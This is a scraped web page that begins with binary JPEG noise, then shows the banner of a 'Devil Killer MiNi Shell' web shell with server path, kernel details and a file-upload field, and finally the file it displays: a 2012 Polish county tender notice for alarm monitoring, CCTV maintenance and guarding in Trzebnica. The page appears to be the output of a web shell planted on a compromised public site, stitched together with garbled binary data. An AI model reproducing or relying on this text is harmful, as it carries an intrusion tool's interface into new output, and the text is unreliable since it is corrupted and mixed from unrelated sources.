JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121120/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121120/460694-N-2012.html

<p class="kh_header"><b>Trzebnica: Przetarg nieograniczony
na zadanie p.n.: Usługa ochrony mienia i konserwacji systemów alarmowych.</b><br>
<b>Numer ogłoszenia: 460694 - 2012; data zamieszczenia: 20.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe w Trzebnicy , ul. Księdza Dziekana Wawrzyńca Bochenka 6, 55-100 Trzebnica, woj. dolnośląskie, tel. 071 3120901, faks 071 3120111.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony
na zadanie p.n.: Usługa ochrony mienia i konserwacji systemów alarmowych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Usługa ochrony mienia i konserwacji systemów alarmowych.

Część I

1.Monitorowanie systemów alarmowych w obiektach Starostwa Powiatowego w Trzebnicy przy ul. Ks.Dz.W.Bochenka 6; ul. Leśnej 1; ul. Solnej 6 oraz obiekt Orlika w Skokowej przy ul.Kościelnej

2.Konserwacja systemów alarmowych, telewizji dozorowej oraz kontroli dostępu w obiektach Starostwa Powiatowego w Trzebnicy przy ul. ks.Dz.W.Bochenka 6; ul. Leśnej 1; ul.Solnej 6 oraz obiekt Orlika w Skokowej przy ul.Kościelnej

Część II

1.Ochrona fizyczna mienia na terenie obiektu położonego w Żmigrodzie przy ul. Poznańskiej 8.

Kod CPV - 79710000-4, 79711000-1, 50340000-0, 50700000-2
Przedmiotem zamówienia są:

Część I

1. monitorowanie lokalnego systemu alarmowego zainstalowanego w obiekcie położonym w  Trzebnicy przy ul. Solnej 6,  poprzez :
a) całodobowe monitorowanie lokalnego systemu alarmowego Abonenta drogą  GPRS GSM  przez Centrum Monitorowania Alarmów, w tym przyjmowanie informacji o stanie naruszenia systemu alarmowego monitorowanego obiektu i przekazywanie jej osobom upoważnionym przez Abonenta oraz Policji i Straży Pożarnej,
b). ochronę bezpośrednią obiektu poprzez uruchomienie grupy interwencyjnej, która po uzyskaniu sygnału o zagrożeniu obiektu, podejmie  czynne działania interwencyjne,
c). czas dojazdu i podjęcie interwencji przez grupę interwencyjną wyniesie : w porze nocnej tj. od godziny 19.00 do godziny 6.00 do 10 minut, a w porze dziennej tj. od 6.00 do 19.00 do 15 minut.

1. Na czas obowiązywania umowy Zleceniobiorca użycza Abonentowi nadajnik GPRS -1 kpl. wraz z kartą SIM z aktywacją.

2. Po zakończeniu trwania umowy Abonent  zwróci urządzenia w stanie nie pogorszonym.

3. W przypadku utraty lub uszkodzenia urządzeń wymienionych w pkt. 1 Abonent  
zobowiązuje się do pokrycia kosztów związanych z zakupem nowych urządzeń.

2. monitorowanie lokalnego systemu alarmowego zainstalowanego w obiekcie położonym w  Skokowej przy ul. Kościelnej  Orlik,  poprzez :
a). całodobowe monitorowanie lokalnego systemu alarmowego Abonenta drogą  GPRS GSM  w tym przyjmowanie informacji o stanie naruszenia systemu alarmowego monitorowanego obiektu i przekazywanie jej osobom upoważnionym przez Abonenta oraz Policji i Straży Pożarnej,
b). ochronę bezpośrednią obiektu poprzez uruchomienie grupy interwencyjnej, która po uzyskaniu sygnału o zagrożeniu obiektu, podejmie  czynne działania interwencyjne,
c). czas dojazdu i podjęcie interwencji przez grupę interwencyjną wyniesie : w porze nocnej tj. od godziny 19.00 do godziny 6.00 od 10 do 15 minut, a w porze dziennej tj. od 6.00 do 19.00 od 15 do 20 minut.

1. Na czas obowiązywania umowy Zleceniobiorca użycza Abonentowi nadajnik GPRS - LX  20 - 1 kpl. wraz z kartą SIM 

2. Po zakończeniu trwania umowy Abonent  zwróci urządzenia w stanie nie pogorszonym.

3. W przypadku utraty lub uszkodzenia urządzeń wymienionych w pkt. 1 Abonent  zobowiązuje się do pokrycia kosztów związanych z zakupem nowych urządzeń.

3. monitorowanie lokalnych systemów alarmowych zainstalowanych w  obiektach położonych w Trzebnicy przy ul. Ks. Dz. W Bochenka 6 i Leśnej 1,  poprzez :
a). całodobowe monitorowanie lokalnego systemu alarmowego Abonenta drogą  telefoniczną - GSM - GPRS   w tym przyjmowanie informacji o stanie naruszenia systemu alarmowego monitorowanego obiektu i przekazywanie jej osobom upoważnionym przez Abonenta,
b). ochronę bezpośrednią obiektu poprzez uruchomienie grupy interwencyjnej , która po uzyskaniu sygnału o zagrożeniu obiektu, podejmie niezwłocznie  czynne działania interwencyjne,
c). czas podjęcia interwencji w porze dziennej tj, od 6.00 do 19.00 wynosić będzie od 10 do 15 minut, a w porze nocnej tj. od 19.00 do 6.00 wynosić będzie od 5 do 10 minut,
d). dokonywanie codziennie pomiędzy 22.00 a 6.00, jednego prewencyjnego podjazdu przez grupę interwencyjną pod obiekt przy ul. Leśnej 1.

2. Działania grupy interwencyjnej zmierzać będzie do udaremnienia powstania szkody na osobie lub mieniu Abonenta.
Na czas obowiązywania umowy Zleceniobiorca użycza  Abonentowi kartę SIM z aktywacją 
Po zakończeniu trwania umowy Abonent  zwróci użyczoną kartę SIM.
W przypadku utraty lub uszkodzenia karty SIM wymienionej w pkt. 1 Abonent  zobowiązuje się do pokrycia kosztów związanych z wydaniem duplikatu karty.


4. konserwacja urządzeń systemu sygnalizacji włamania i napadu oraz CCTV zainstalowanych w obiektach Zamawiającego w Trzebnicy przy ul. Ks.Dz.W.Bochenka 6 oraz przy ul.Leśnej 1.

Wykonawca zobowiązany jest do dokonywania technicznych czynności konserwacyjnych urządzeń systemu sygnalizacji włamania i napadu oraz CCTV, poprzez :
a). sprawdzenie i wyregulowanie centrali, czujek, manipulatorów, sygnalizatorów zasilania awaryjnego oraz pozostałych urządzeń systemu sygnalizacji włamania i napadu oraz CCTV wymienionych w dzienniku konserwacji,
b). wymiany niesprawnych elementów na elementy sprawne technicznie,
c). sprawdzenie parametrów linii, stanu zasilania awaryjnego - pomiaru napięć w punktach kontrolnych,
d). sprawdzenie poprawności działania całego systemu poprzez wywoływanie próbnego alarmu w obecności osoby upoważnionej przez Zleceniodawcę,
e). sporządzenie protokołu z czynności konserwacyjnych.
Wykonawca będzie dokonywał konserwacji urządzeń systemu sygnalizacji włamań i napadu oraz CCTV raz na kwartał.

Czynności konserwacyjne, nie obejmują :
a). uszkodzeń mechanicznych oraz elektrycznych instalacji, spowodowanych ingerencją osób niepowołanych,
b). uszkodzeń spowodowanych innymi wypadkami losowymi oraz wadami i uszkodzeniami powstałymi w wyniku eksploatowania w warunkach niezgodnych z instrukcja obsługi systemu sygnalizacji włamań i napadu.
c). uszkodzeń spowodowanych niekorzystnymi warunkami atmosferycznymi,
d). kosztów zakupu  baterii, akumulatorów i innych elementów systemu włamania i napadu oraz CCTV itp.
Ponadto Wykonawca zobowiązuje się do odpłatnego dokonywania napraw urządzeń i instalacji systemy sygnalizacji włamania i napadu oraz CCTV, określonych w punkcie powyższym,  zgłoszonych przez Zamawiającego lub stwierdzonych podczas  czynności konserwacyjnych.
Do obowiązków Zamawiającego   należy :
a). zabezpieczenie urządzeń systemu sygnalizacji włamań i napadu oraz CCTV przed dostępem i manipulacją osób niepowołanych,
b). na każde żądanie konserwatora udostępnić mu urządzenia będące przedmiotem konserwacji,
Wykonawca zobowiązany jest do podjęcia działań zmierzających do usunięcia usterek, które wystąpią w pracy systemu sygnalizacji włamań i napadu oraz CCTV, w okresie do 24 godzin od chwili przyjęcia zgłoszenia.
W okresie pomiędzy zgłoszeniem konieczności dokonania naprawy a jej wykonaniem, bez względu na to, która z umawiających się stron zgłosiła taką konieczność, Zamawiający  zabezpieczy swoje mienie we własnym zakresie. Obowiązek ten może przejąć Wykonawca na podstawie odrębnej umowy z Zamawiającym.

5.konserwacja urządzeń systemu sygnalizacji włamania i napadu zainstalowanych w obiekcie Zleceniodawcy w Skokowej przy ul. Kościelnej Orlik

Wykonawca zobowiązany jest do dokonywania technicznych czynności konserwacyjnych urządzeń systemu sygnalizacji włamania i napadu, poprzez :
a). sprawdzenie i wyregulowanie centrali, czujek, manipulatorów, sygnalizatorów zasilania awaryjnego oraz pozostałych urządzeń systemu sygnalizacji włamania i napadu, wymienionych w dzienniku konserwacji,
b). wymiany niesprawnych elementów na elementy sprawne technicznie,
c). sprawdzenie parametrów linii, stanu zasilania awaryjnego - pomiaru napięć w punktach kontrolnych,
d). sprawdzenie poprawności działania całego systemu poprzez wywoływanie próbnego alarmu w obecności osoby upoważnionej przez Zamawiającego,
e). sporządzenie protokołu z przeglądu  konserwacyjnego 
Wykonawca będzie dokonywał konserwacji urządzeń systemu sygnalizacji włamań i napadu raz na pół roku.
Czynności konserwacyjne,  nie obejmują :
a). uszkodzeń mechanicznych oraz elektrycznych instalacji, spowodowanych ingerencją osób niepowołanych,
b). uszkodzeń spowodowanych innymi wypadkami losowymi oraz wadami i uszkodzeniami powstałymi w wyniku eksploatowania w warunkach niezgodnych z instrukcja obsługi systemu sygnalizacji włamań i napadu.
c). uszkodzeń spowodowanych niekorzystnymi warunkami atmosferycznymi,
d). kosztów zakupu  baterii, akumulatorów i innych elementów systemu alarmowego itp.
Ponadto Wykonawca zobowiązany jest do odpłatnego dokonywania napraw urządzeń i instalacji systemy sygnalizacji włamania i napadu, zgłoszonych przez Zamawiającego lub stwierdzonych podczas  czynności konserwacyjnych.
Do obowiązków Zamawiającego   należy :
a). zabezpieczenie urządzeń systemu sygnalizacji włamań i napadu przed dostępem i manipulacją osób niepowołanych,
b). na każde żądanie konserwatora udostępnić mu urządzenia będące przedmiotem konserwacji,
Wykonawca zobowiązany jest do podjęcia działań zmierzających do usunięcia usterek, które wystąpią w pracy systemu sygnalizacji włamań i napadu, w okresie do 24 godzin od chwili przyjęcia zgłoszenia.
W okresie pomiędzy zgłoszeniem konieczności dokonania naprawy a jej wykonaniem, bez względu na to, która z umawiających się stron zgłosiła taką konieczność, Zamawiający  zabezpieczy swoje mienie we własnym zakresie. Obowiązek ten może przejąć Wykonawca na podstawie odrębnej umowy z Zamawiającym.
6.konserwacja urządzeń systemu sygnalizacji włamania i napadu zainstalowanych w obiekcie Zamawiającego w Trzebnicy przy ul. Solnej 6.
Wykonawca zobowiązany jest do dokonywania technicznych czynności konserwacyjnych urządzeń systemu sygnalizacji włamania i napadu, poprzez :
a). sprawdzenie i wyregulowanie centrali, czujek, manipulatorów, sygnalizatorów zasilania awaryjnego oraz pozostałych urządzeń systemu sygnalizacji włamania i napadu, wymienionych w dzienniku konserwacji,
b). wymiany niesprawnych elementów na elementy sprawne technicznie,
c). sprawdzenie parametrów linii, stanu zasilania awaryjnego - pomiaru napięć w punktach kontrolnych,
d). sprawdzenie poprawności działania całego systemu poprzez wywoływanie próbnego alarmu w obecności osoby upoważnionej przez Zleceniodawcę,
e). sporządzenie protokołu z przeglądu konserwacyjnego 
Wykonawca będzie dokonywał konserwacji urządzeń systemu sygnalizacji włamań i napadu raz na pół roku.
Czynności konserwacyjne,  nie obejmują :
a). uszkodzeń mechanicznych oraz elektrycznych instalacji, spowodowanych ingerencją osób niepowołanych,
b). uszkodzeń spowodowanych innymi wypadkami losowymi oraz wadami i uszkodzeniami powstałymi w wyniku eksploatowania w warunkach niezgodnych z instrukcja obsługi systemu sygnalizacji włamań i napadu.
c). uszkodzeń spowodowanych niekorzystnymi warunkami atmosferycznymi,
d). kosztów zakupu  baterii, akumulatorów i innych elementów systemu alarmowego itp.
Ponadto Wykonawca zobowiązany jest do odpłatnego dokonywania napraw urządzeń i instalacji systemy sygnalizacji włamania i napadu, określonych w punkcie powyższym,  zgłoszonych przez Zleceniodawcę lub stwierdzonych podczas  czynności konserwacyjnych.
Do obowiązków Zamawiającego   należy :
a). zabezpieczenie urządzeń systemu sygnalizacji włamań i napadu przed dostępem i manipulacją osób niepowołanych,
b). na każde żądanie konserwatora udostępnić mu urządzenia będące przedmiotem konserwacji,
Wykonawca zobowiązany jest  do podjęcia działań zmierzających do usunięcia usterek, które wystąpią w pracy systemu sygnalizacji włamań i napadu, w okresie do 24 godzin od chwili przyjęcia zgłoszenia.
W okresie pomiędzy zgłoszeniem konieczności dokonania naprawy a jej wykonaniem, bez względu na to, która z umawiających się stron zgłosiła taką konieczność, Zamawiający  zabezpieczy swoje mienie we własnym zakresie. Obowiązek ten może przejąć Wykonawca na podstawie odrębnej umowy z Zamawiającym.

Część II
Usługa ochrony mienia na terenie obiektu Zamawiającego położonego w miejscowości Żmigród przy ul. Poznańskiej nr 8, na następujących warunkach: 
Ochrona fizyczna, polegająca na dozorze mienia Zamawiającego przez jednego nie licencjonowanego pracownika w następującym systemie:
Praca w godzinach od 20:00 do 08:00 od poniedziałku do niedzieli,
Ochrona ma polegać na dozorze przed kradzieżą, kradzieżą z włamaniem oraz przeciwdziałaniu skutkom pożaru. Przez włamanie rozumie się bezprawne wtargnięcie do strzeżonych obiektów osób nieupoważnionych, pozostawiające ślady włamania zewnętrznego oraz zabór mienia

Mienie Zamawiającego obejmujące zewidencjonowane środki trwałe znajdujące się na terenie obiektu, zostaną przyjęte przez Wykonawcę do dozoru na podstawie stosownego protokołu, aktualizowanego każdorazowo zgodnie ze stanem faktycznym.

W przypadku stwierdzenia faktu włamania, kradzieży z włamaniem, zniszczenia bądź uszkodzenia dozorowanego przez Wykonawcę mienia jest on zobowiązany natychmiast powiadomić Zamawiającego (telefonicznie oraz mailowo) i ustalić termin, w którym strony protokolarnie dokonają wskazania braków, uszkodzeń w mieniu według spisu z natury i porównania z faktycznym stanem po zaistnieniu w/w zdarzeń. W przypadku nieprzystąpienia przez Wykonawcę do spisywania protokołu, protokół jednostronnie sporządzi Zamawiający.


Nazwa i kod wg Wspólnego Słownika Zamówień (CPV):
- 79710000-4 - usługi ochroniarskie 
- 79711000-1 - usługi nadzoru przy użyciu alarmu 
- 50340000-0 - usługi w zakresie napraw i konserwacji urządzeń audiowizualnych i optycznych 
- 50700000-2 - usługi w zakresie napraw i konserwacji instalacji budynkowych.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza udzielenie zamówień uzupełniających, o których mowa w art.
67 ust. 1 pkt 6 ustawy PZP do 20 % wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4, 79.71.10.00-1, 50.34.00.00-0, 50.70.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium  nie jest wymagane.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sprawdzenie w/w warunków udziału w postępowaniu odbywać się będzie na podstawie
przedłożonych przez Wykonawcę dokumentów i oświadczeń wg zasady spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sprawdzenie w/w warunków udziału w postępowaniu odbywać się będzie na podstawie
przedłożonych przez Wykonawcę dokumentów i oświadczeń wg zasady spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sprawdzenie w/w warunków udziału w postępowaniu odbywać się będzie na podstawie
przedłożonych przez Wykonawcę dokumentów i oświadczeń wg zasady spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sprawdzenie w/w warunków udziału w postępowaniu odbywać się będzie na podstawie
przedłożonych przez Wykonawcę dokumentów i oświadczeń wg zasady spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sprawdzenie w/w warunków udziału w postępowaniu odbywać się będzie na podstawie
przedłożonych przez Wykonawcę dokumentów i oświadczeń wg zasady spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat.trzebnica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Trzebnicy
ul. Ks. Dz.W. Bochenka 6
55-100 Trzebnica.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.11.2012 godzina 12:00, miejsce: Starostwo Powiatowe w Trzebnicy
ul. Ks. Dz.W. Bochenka 6
55-100 Trzebnica
sekretariat I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> 1.Monitorowanie systemów alarmowych w obiektach Starostwa Powiatowego w Trzebnicy przy ul. Ks.Dz.W.Bochenka 6; ul. Leśnej 1; ul. Solnej 6 oraz obiekt Orlika w Skokowej przy ul.Kościelnej
2.Konserwacja systemów alarmowych, telewizji dozorowej oraz kontroli dostępu w obiektach Starostwa Powiatowego w Trzebnicy przy ul. ks.Dz.W.Bochenka 6; ul. Leśnej 1; ul.Solnej 6 oraz obiekt Orlika w Skokowej przy ul.Kościelnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część I
1. monitorowanie lokalnego systemu alarmowego zainstalowanego w obiekcie położonym w  Trzebnicy przy ul. Solnej 6,  poprzez :
a) całodobowe monitorowanie lokalnego systemu alarmowego Abonenta drogą  GPRS GSM  przez Centrum Monitorowania Alarmów, w tym przyjmowanie informacji o stanie naruszenia systemu alarmowego monitorowanego obiektu i przekazywanie jej osobom upoważnionym przez Abonenta oraz Policji i Straży Pożarnej,
b). ochronę bezpośrednią obiektu poprzez uruchomienie grupy interwencyjnej, która po uzyskaniu sygnału o zagrożeniu obiektu, podejmie  czynne działania interwencyjne,
